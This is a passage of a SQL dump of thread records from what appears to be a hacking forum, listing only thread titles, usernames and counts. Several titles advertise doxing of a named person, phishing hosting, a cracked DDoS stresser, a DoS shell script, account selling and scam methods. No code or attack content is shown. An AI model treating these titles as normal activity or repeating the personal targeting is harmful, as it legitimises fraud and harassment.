'1350620861', 'mothered', '205', '26', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('873', '7', 'What do you think of Facebook?', '0', '0', '0', '205', 'mothered', '1350268348', '4718', '1350613030', 't3h jok3r', '1', '25', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('874', '7', 'N.A.S.A HACKED', '0', '0', '0', '257', 'XxTREYZxX', '1350268816', '4722', '1350995425', 'dccfoux', '285', '56', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('875', '3', 'New LH Avatars', '0', '0', '0', '1', 't3h jok3r', '1350275816', '4739', '1350339753', '??????????¢™', '3', '93', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('876', '7', 'Anyone have a paypal + ebay I can buy off you?', '0', '0', '0', '222', 'Exposé', '1350276079', '4742', '1350328816', 'iTzIpod', '82', '18', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('877', '11', 'could some one teach how to hack facebook tetrisfreinds', '0', '0', '0', '257', 'XxTREYZxX', '1350278405', '4747', '1351549369', 'anonymous_sam', '304', '13', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('878', '16', 'ƒ???????????g\'s Dell SE Method....', '0', '0', '0', '222', 'Exposé', '1350283397', '4748', '1350707295', 'Exposé', '222', '18', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('879', '9', 'could some one teach how to make money on a site.', '0', '0', '0', '257', 'XxTREYZxX', '1350290641', '4750', '1350315834', '??zg???g????61', '100', '10', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('880', '9', '[eBook] How to make a fortune by playing Fifa ($65 eBook) [ONLY $3!]', '0', '0', '0', '100', '??zg???g????61', '1350316371', '4765', '1350348858', '??zg???g????61', '100', '11', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('881', '35', 'Which Signature Is Better ? | Rate My Graphics !!!', '0', '17', '0', '228', 'VirtualLegend', '1350322703', '4775', '1350377402', 'XxTREYZxX', '257', '18', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('883', '7', 'Congratz virtual', '0', '0', '0', '4', 'Triple H', '1350329533', '4784', '1350387037', 'mothered', '205', '40', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('882', '9', '[ Get ] Google Sniper 2.0 | Best Affiliate Marketing Method On the Internet', '0', '0', '0', '228', 'VirtualLegend', '1350327955', '4777', '1350389494', 'VirtualLegend', '228', '27', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('884', '2', 'Testing new Mycodes', '0', '0', '0', '1', 't3h jok3r', '1350338202', '4795', '1350424473', 't3h jok3r', '1', '8', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('885', '71', 'Who Has Already Pre-Ordered Black Ops 2 ?', '0', '0', '0', '228', 'VirtualLegend', '1350348181', '4812', '1350374106', 'R?????zo?', '62', '14', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('886', '35', 'My logo', '0', '0', '0', '257', 'XxTREYZxX', '1350352852', '4820', '1350418044', 'XxTREYZxX', '257', '21', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('887', '3', 'How did virtual become Mod? Explanation here', '0', '0', '0', '1', 't3h jok3r', '1350353469', '4823', '1350442280', 'Exposé', '222', '85', '14', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('888', '7', 'Greed is a scammer', '0', '0', '0', '82', 'iTzIpod', '1350357160', '4832', '1350427159', '??????????¢™', '3', '98', '19', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('889', '3', 'Vote for a new theme', '0', '0', '4', '1', 't3h jok3r', '1350361900', '4842', '1350774985', 'NXK', '61', '94', '18', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('891', '35', 'My New Signature !!! | Rate My Signature', '0', '17', '0', '228', 'VirtualLegend', '1350393266', '4878', '1350399268', 'D?ea', '264', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('890', '71', 'Boreder lands 2', '0', '0', '0', '257', 'XxTREYZxX', '1350379627', '4860', '1350379627', 'XxTREYZxX', '257', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('892', '8', 'Post New And Awesome Songs Here !!!', '0', '0', '0', '228', 'VirtualLegend', '1350393859', '4879', '1350554104', 'R?????zo?', '62', '8', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('897', '9', 'YouTube SEO - Like a baws.', '0', '0', '0', '264', 'D?ea', '1350400935', '4897', '1350500988', 'D?ea', '264', '26', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('893', '77', 'GamerTag Availability Checker Site', '0', '0', '0', '100', '??zg???g????61', '1350395912', '4885', '1351648312', 'CommandoModz', '306', '21', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('894', '21', '[FREE] Anonymous Stresser [Cracked]', '0', '0', '0', '100', '??zg???g????61', '1350396459', '4886', '1350759665', 't3h jok3r', '1', '47', '9', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('898', '71', 'Can You Run It? | Tutorial (Very Handy For PC Gamers) |', '0', '0', '0', '228', 'VirtualLegend', '1350406194', '4906', '1350446676', 'XxTREYZxX', '257', '20', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('895', '4', 'D?ea saying hello<3', '0', '0', '0', '264', 'D?ea', '1350398963', '4887', '1350469601', 'D?ea', '264', '30', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('896', '23', 'How to secure your Router', '0', '0', '0', '264', 'D?ea', '1350399187', '4892', '1350724867', 'R?????zo?', '62', '33', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('899', '7', '[Demo] New L33THacking Skype Resolver', '0', '0', '0', '61', 'NXK', '1350419409', '4919', '1350475280', 'NXK', '61', '45', '11', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('900', '63', 'Who wants a New Signature !!! | I will make one for you!', '0', '0', '0', '228', 'VirtualLegend', '1350424596', '4929', '1351638587', 'VirtualLegend', '228', '75', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('901', '19', '[Junk]L33THacking Skype Resolver!', '0', '0', '0', '214', 'Rave™', '1350424793', '4930', '1350700030', 't3h jok3r', '1', '30', '8', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('903', '50', 'Report against a thread', '0', '0', '0', '5', 'Timmy', '1350432711', '4952', '1350432711', 'Timmy', '5', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('902', '52', 'Who wants a Tutorial on how to make a Generator in VB', '0', '0', '0', '228', 'VirtualLegend', '1350427511', '4937', '1350903396', 'VirtualLegend', '228', '18', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('904', '7', 'New Official L33THacking Skype Group Chat', '0', '0', '0', '3', '??????????¢™', '1350434160', '4965', '1350500448', 'R?????zo?', '62', '33', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('906', '42', 'DOX of Kody Maxson', '0', '0', '0', '1', 't3h jok3r', '1350439287', '4982', '1350762622', 'Apathy', '2', '58', '17', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('905', '42', 'Anonymous identified cyber stalker who drove Amanda Todd to suicide', '0', '0', '0', '8', 'spacefish36', '1350435281', '4966', '1350544871', 'HoverCatz', '67', '34', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('907', '7', 'Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '0', '0', '3', '??????????¢™', '1350444382', '4998', '1350690790', '??????????¢™', '3', '49', '17', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('908', '54', '[17OCT]bangbros,mofos,pornpros,realitykings,vivid,naughtyamerica,brazzers and many', '0', '0', '0', '255', 'sbhshroy2', '1350444662', '4999', '1350461363', 'R?????zo?', '62', '7', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('909', '19', '[Junk]Give me HF rep pl0x...', '0', '0', '0', '222', 'Exposé', '1350448256', '5014', '1350450592', 't3h jok3r', '1', '11', '4', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('910', '49', 'Referral Contest?', '0', '0', '0', '222', 'Exposé', '1350448890', '5021', '1350834757', 'iTzIpod', '82', '29', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('911', '7', 'Anyone have experience in wordpress?', '0', '0', '0', '222', 'Exposé', '1350449054', '5022', '1350449054', 'Exposé', '222', '1', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('912', '7', 'Woah Awesome. Something you should check.', '0', '0', '0', '5', 'Timmy', '1350449185', '5023', '1350548291', 'PiXEL^OG', '258', '41', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('913', '7', 'Anarchyforums.net - Owner is a well known scammer', '0', '0', '0', '5', 'Timmy', '1350449280', '5024', '1350471245', 'mothered', '205', '21', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('914', '7', 'Advertise on Pasteheaven!', '0', '0', '0', '222', 'Exposé', '1350451233', '5041', '1350460714', 'R?????zo?', '62', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('915', '7', 'PasteIT AIO - By ƒ???????????g', '0', '0', '0', '222', 'Exposé', '1350454860', '5043', '1350536763', 'Exposé', '222', '59', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('919', '7', '[Free] Custom Mousepad - Only $1 with free shipping', '0', '0', '0', '264', 'D?ea', '1350477472', '5099', '1350501141', 'D?ea', '264', '28', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('917', '7', 'Please help me', '0', '0', '0', '264', 'D?ea', '1350472978', '5087', '1350472978', 'D?ea', '264', '6', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('916', '3', 'Subject too long', '0', '0', '0', '62', 'R?????zo?', '1350461871', '5066', '1350526430', '??????????¢™', '3', '26', '8', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('918', '65', 'I feel famous', '0', '0', '0', '264', 'D?ea', '1350473034', '5088', '1351011709', 'D?ea', '264', '83', '26', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('920', '49', '[IDEA] Award System', '0', '12', '0', '264', 'D?ea', '1350497366', '5118', '1350502850', 'D?ea', '264', '42', '16', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('921', '4', 'Hey', '0', '6', '0', '270', 'LCS', '1350499559', '5120', '1350593964', 'iTzIpod', '82', '46', '10', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('922', '9', '???EFYU.net || Easy $20/hour || Cashout with hundreds of methods!???', '0', '0', '0', '270', 'LCS', '1350499669', '5121', '1350651248', 'LCS', '270', '55', '12', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('927', '72', 'BLACK OPS ZOMBIE TIPS', '0', '0', '0', '257', 'XxTREYZxX', '1350519699', '5191', '1350551003', 'XxTREYZxX', '257', '12', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1000', '3', 'Congrats NXK and ??????????¢™', '0', '0', '0', '222', 'Exposé', '1350705335', '5654', '1350789911', 't3h jok3r', '1', '31', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('923', '73', 'no more series', '0', '0', '0', '257', 'XxTREYZxX', '1350503923', '5172', '1350503923', 'XxTREYZxX', '257', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('1002', '3', 'New mods and forum updates', '0', '0', '0', '1', 't3h jok3r', '1350707318', '5666', '1350790108', 't3h jok3r', '1', '98', '19', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('924', '71', 'Ratchet and Clank @#$%^&^&*(', '0', '0', '0', '257', 'XxTREYZxX', '1350504088', '5173', '1350504088', 'XxTREYZxX', '257', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('925', '7', 'gaming thread down(READ)', '0', '0', '0', '257', 'XxTREYZxX', '1350504529', '5174', '1350526091', 'XxTREYZxX', '257', '16', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('928', '49', 'MOTM', '0', '0', '0', '257', 'XxTREYZxX', '1350522467', '5194', '1350755502', 'iTzIpod', '82', '80', '22', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('929', '49', 'AWARD SYSTEM', '0', '0', '0', '257', 'XxTREYZxX', '1350522686', '5196', '1350525546', 't3h jok3r', '1', '14', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('930', '7', 'am i a nice and helpfull member', '0', '0', '0', '257', 'XxTREYZxX', '1350523176', '5197', '1350771623', 'mothered', '205', '44', '15', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('931', '19', '[Junk]Joker\'s DOX', '0', '0', '0', '272', 'YuckFou', '1350526766', '5238', '1350526820', 't3h jok3r', '1', '10', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('932', '19', '[Junk]Joker\'s DOX - Updated', '0', '0', '0', '272', 'YuckFou', '1350526964', '5240', '1350527029', 't3h jok3r', '1', '4', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('933', '19', '[Junk]Joker\'s DOX - Updated', '0', '0', '0', '272', 'YuckFou', '1350527053', '5242', '1350527075', 't3h jok3r', '1', '6', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('984', '7', 'What size pizza can you eat?', '0', '0', '0', '205', 'mothered', '1350621080', '5533', '1350638003', 'R?????zo?', '62', '12', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('935', '19', '[Junk][Junk]Couple of cracked programs.', '0', '0', '0', '5', 'Timmy', '1350530747', '5256', '1350561999', 'NXK', '61', '10', '1', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('936', '18', '4 adf.ly bots with proxygrabber', '0', '0', '0', '5', 'Timmy', '1350531132', '5257', '1350782763', 'XxTREYZxX', '257', '24', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('937', '19', '[Junk]Nude Bot- Mr. Do you want to fap?', '0', '0', '0', '5', 'Timmy', '1350531240', '5258', '1351835566', 't3h jok3r', '1', '32', '6', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('938', '46', 'List of good webhosts to host your phishing pages', '0', '0', '0', '5', 'Timmy', '1350531544', '5259', '1350873721', 'Exposé', '222', '33', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('939', '49', 'a contest', '0', '0', '0', '257', 'XxTREYZxX', '1350542350', '5267', '1350593919', 'iTzIpod', '82', '9', '3', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('940', '7', 'TheAnarchist I have your dox!', '0', '0', '0', '222', 'Exposé', '1350542961', '5270', '1350574549', 'NXK', '61', '40', '2', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('941', '35', 'Logo Competition for LH?', '0', '0', '0', '222', 'Exposé', '1350543143', '5271', '1350561413', 'NXK', '61', '25', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('942', '49', 'DDos protected hosting?', '0', '0', '0', '222', 'Exposé', '1350544212', '5277', '1350609639', 't3h jok3r', '1', '25', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('943', '74', 'MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '17', '0', '257', 'XxTREYZxX', '1350544909', '5283', '1350745904', 'iTzIpod', '82', '18', '8', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('947', '8', 'GANGNAM STYLE', '0', '0', '0', '257', 'XxTREYZxX', '1350553535', '5329', '1351052222', 'mothered', '205', '61', '17', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('944', '66', 'What\'s your BF3 Method-ology?', '0', '0', '0', '222', 'Exposé', '1350544960', '5284', '1350837129', 'NXK', '61', '16', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('945', '7', 'I dont want.......', '0', '0', '0', '67', 'HoverCatz', '1350545423', '5288', '1350906105', 'iTzIpod', '82', '75', '16', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('946', '19', '[Junk]Delete the dam stars :P', '0', '0', '0', '222', 'Exposé', '1350546805', '5293', '1350556466', 'VirtualLegend', '228', '19', '5', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('959', '9', 'How to make $50+ / Day with AdFoc or Adfly', '0', '0', '0', '62', 'R?????zo?', '1350594167', '5405', '1352117967', 'sirchamp', '53', '40', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('948', '74', 'MINECRAFT world download', '0', '0', '0', '257', 'XxTREYZxX', '1350554401', '5336', '1350788296', 'XxTREYZxX', '257', '32', '13', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('999', '67', '[Guide] How To Setup A PHP DoS (Shell) Script', '0', '0', '0', '5', 'Timmy', '1350703914', '5650', '1350726684', 'R?????zo?', '62', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('950', '35', 'Which theme do you like better?', '0', '0', '0', '222', 'Exposé', '1350558730', '5349', '1350594591', 'iTzIpod', '82', '13', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('949', '72', 'mw3 hack', '0', '0', '0', '257', 'XxTREYZxX', '1350555713', '5339', '1350770820', 'VirtualLegend', '228', '11', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('951', '71', 'L33thacking Minecraft Server', '0', '10', '0', '228', 'VirtualLegend', '1350563758', '5363', '1352230628', 'VirtualLegend', '228', '90', '21', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('952', '34', 'A nice clean signature tutorial', '0', '9', '0', '2', 'Apathy', '1350564320', '5366', '1350608349', 'Exposé', '222', '21', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('953', '34', '| [ Newbie Guide ] Photoshop Site\'s For Beginners | [ Very Helpful ] |', '0', '0', '0', '228', 'VirtualLegend', '1350564502', '5367', '1350616951', 'iTzIpod', '82', '12', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('954', '35', '/\\ New Signature | Rate My Graphics !!! /\\', '0', '0', '0', '228', 'VirtualLegend', '1350572880', '5371', '1350601220', 'Exposé', '222', '25', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('961', '61', '??$$[CAN NEVER BE SATURATED] How To Earn $50\\Week! ??', '0', '0', '0', '62', 'R?????zo?', '1350594919', '5425', '1350675250', 'iTzIpod', '82', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('962', '61', '$100/month Ebook', '0', '0', '0', '62', 'R?????zo?', '1350595031', '5427', '1350595031', 'R?????zo?', '62', '2', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('963', '17', '??SIEGRIED\'S EWHORE METHOD ??', '0', '0', '0', '62', 'R?????zo?', '1350595119', '5430', '1350857998', 'R?????zo?', '62', '19', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('955', '75', 'saints row 2 cheats', '0', '0', '0', '257', 'XxTREYZxX', '1350592621', '5384', '1350592621', 'XxTREYZxX', '257', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('956', '75', 'Halo tips,tricks and cheats :O', '0', '0', '0', '257', 'XxTREYZxX', '1350593169', '5385', '1350774318', 'VirtualLegend', '228', '5', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('957', '9', '| [ Get ] My Mobile Business In A Box | Start Your Own Mobile Business |', '0', '0', '0', '228', 'VirtualLegend', '1350593317', '5386', '1350633843', 'R?????zo?', '62', '34', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('958', '73', 'subway surfers', '0', '17', '0', '257', 'XxTREYZxX', '1350593440', '5387', '1350610028', 't3h jok3r', '1', '7', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('965', '61', '?Free Unlimited Battlefield 3 Limited Edition Codes?', '0', '0', '0', '62', 'R?????zo?', '1350595450', '5439', '1350595450', 'R?????zo?', '62', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('960', '61', '[24-7 Traffic Bot] Adf.ly | Adfoc.us | LinkBucks | Traffic Exchange | All in One Bot!', '0', '0', '0', '62', 'R?????zo?', '1350594377', '5410', '1350594377', 'R?????zo?', '62', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('981', '4', 'Whatsup Holmes.', '0', '0', '0', '278', 'Yoess', '1350600629', '5480', '1350648080', 'NXK', '61', '27', '9', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('964', '19', '[Junk][UPDATED] L33T Hacking Skype Resolver', '0', '0', '0', '214', 'Rave™', '1350595218', '5433', '1352011206', 't3h jok3r', '1', '32', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('966', '61', '[99$] Lots of money for anything FAST! [LEAKED]', '0', '0', '0', '62', 'R?????zo?', '1350595588', '5441', '1351749644', 'VirtualLegend', '228', '8', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('967', '9', '[Free]Awesome Monetizing, and SEO eBooks Collections [Free]WORTH 1000$', '0', '0', '0', '62', 'R?????zo?', '1350595699', '5443', '1350597230', 'VirtualLegend', '228', '8', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('968', '61', '[Ebook] [HOT] Get Any Girls Nudes You Want [HOT] [Ebook]', '0', '0', '0', '62', 'R?????zo?', '1350595749', '5444', '1350680617', 'R?????zo?', '62', '10', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('969', '9', 'UNSATURATED Method - Start Earning Money NOW on 75% AUTOPILOT - $50-100 Per DAY', '0', '0', '0', '62', 'R?????zo?', '1350595842', '5447', '1350596353', 'VirtualLegend', '228', '6', '1', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('972', '16', 'Social Engineering Package', '0', '0', '0', '62', 'R?????zo?', '1350596435', '5453', '1350633583', 'R?????zo?', '62', '9', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('970', '61', 'Free Premium Ebook Bundle', '0', '0', '0', '62', 'R?????zo?', '1350595970', '5448', '1350595970', 'R?????zo?', '62', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('971', '9', 'EASY $250 EACH DAY | \"The Webmaster Method\" | Instant paypal money, no wait', '0', '0', '0', '62', 'R?????zo?', '1350596153', '5449', '1350633759', 'R?????zo?', '62', '17', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('980', '43', '50,000 CD KEYS OF PC GAMES', '0', '0', '0', '62', 'R?????zo?', '1350597412', '5466', '1350906029', 'R?????zo?', '62', '21', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('973', '19', '[Junk]New HF Logo?', '0', '0', '0', '214', 'Rave™', '1350596533', '5454', '1350647984', 'NXK', '61', '21', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('974', '61', 'Get Abs Sitting at your Computer in 2 weeks!', '0', '0', '0', '62', 'R?????zo?', '1350596609', '5455', '1350755549', 'R?????zo?', '62', '6', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('975', '7', 'how do i insert a pic', '0', '0', '0', '257', 'XxTREYZxX', '1350596627', '5456', '1350613327', 'XxTREYZxX', '257', '22', '7', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('976', '71', 'Halo 4', '0', '0', '0', '257', 'XxTREYZxX', '1350596963', '5459', '1351130681', 'XxTREYZxX', '257', '11', '4', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('977', '14', '[FREE] VPN Every 24 Hours [FREE]', '0', '0', '0', '62', 'R?????zo?', '1350596999', '5460', '1350596999', 'R?????zo?', '62', '4', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('978', '73', 'IOS vs ANDROID', '0', '0', '0', '257', 'XxTREYZxX', '1350597127', '5461', '1350799430', 'XxTREYZxX', '257', '15', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('979', '14', '4200 Checked HTTP Proxy Servers (L1/L2/L3)', '0', '0', '0', '62', 'R?????zo?', '1350597128', '5462', '1350597128', 'R?????zo?', '62', '3', '0', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('983', '47', 'MC PREMIUM GIVE AWAY', '0', '0', '0', '257', 'XxTREYZxX', '1350606401', '5495', '1350834979', 'iTzIpod', '82', '44', '13', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('982', '7', 'GREED', '0', '0', '0', '257', 'XxTREYZxX', '1350605140', '5489', '1350609293', 't3h jok3r', '1', '24', '8', '1', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('985', '7', 'World\'s Longest Email Address', '0', '0', '0', '205', 'mothered', '1350621213', '5534', '1350706587', 'mothered', '205', '25', '7', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('986', '24', 'What VM do you use and why?', '0', '0', '0', '205', 'mothered', '1350621475', '5535', '1350650166', 'R?????zo?', '62', '8', '3', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('997', '14', 'Discovery Channel - Track Me If You Can 2010', '0', '0', '0', '5', 'Timmy', '1350700870', '5646', '1352186259', 'p420', '9', '20', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('987', '13', '[TUT] Using Metasploit to harvest all emails of a website', '0', '0', '0', '258', 'PiXEL^OG', '1350630128', '5542', '1350735519', 'PiXEL^OG', '258', '25', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('988', '12', '[TUT] Watch +18 Youtube Videos Without an Account', '0', '0', '0', '258', 'PiXEL^OG', '1350630423', '5543', '1351541340', 'iTzIpod', '82', '20', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('989', '68', 'Free Proxy script , Make your own Proxy browsing site like Hidemyass!!!', '0', '0', '0', '258', 'PiXEL^OG', '1350630514', '5544', '1352025622', 'PiXEL^OG', '258', '19', '5', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('990', '12', 'How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '0', '0', '258', 'PiXEL^OG', '1350630641', '5545', '1350710838', 'PiXEL^OG', '258', '18', '6', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('991', '14', 'VPN Accounts With Guide :)', '0', '0', '0', '62', 'R?????zo?', '1350650722', '5592', '1352572115', 'Triple H', '4', '11', '2', '', '0', '0', '0', '', '1', '0', '0', '0'); INSERT INTO mybb_threads VALUES('992', '17', '[GUIDE] Verifying a PayPal Account FREE+ANONYMOUSLY', '0', 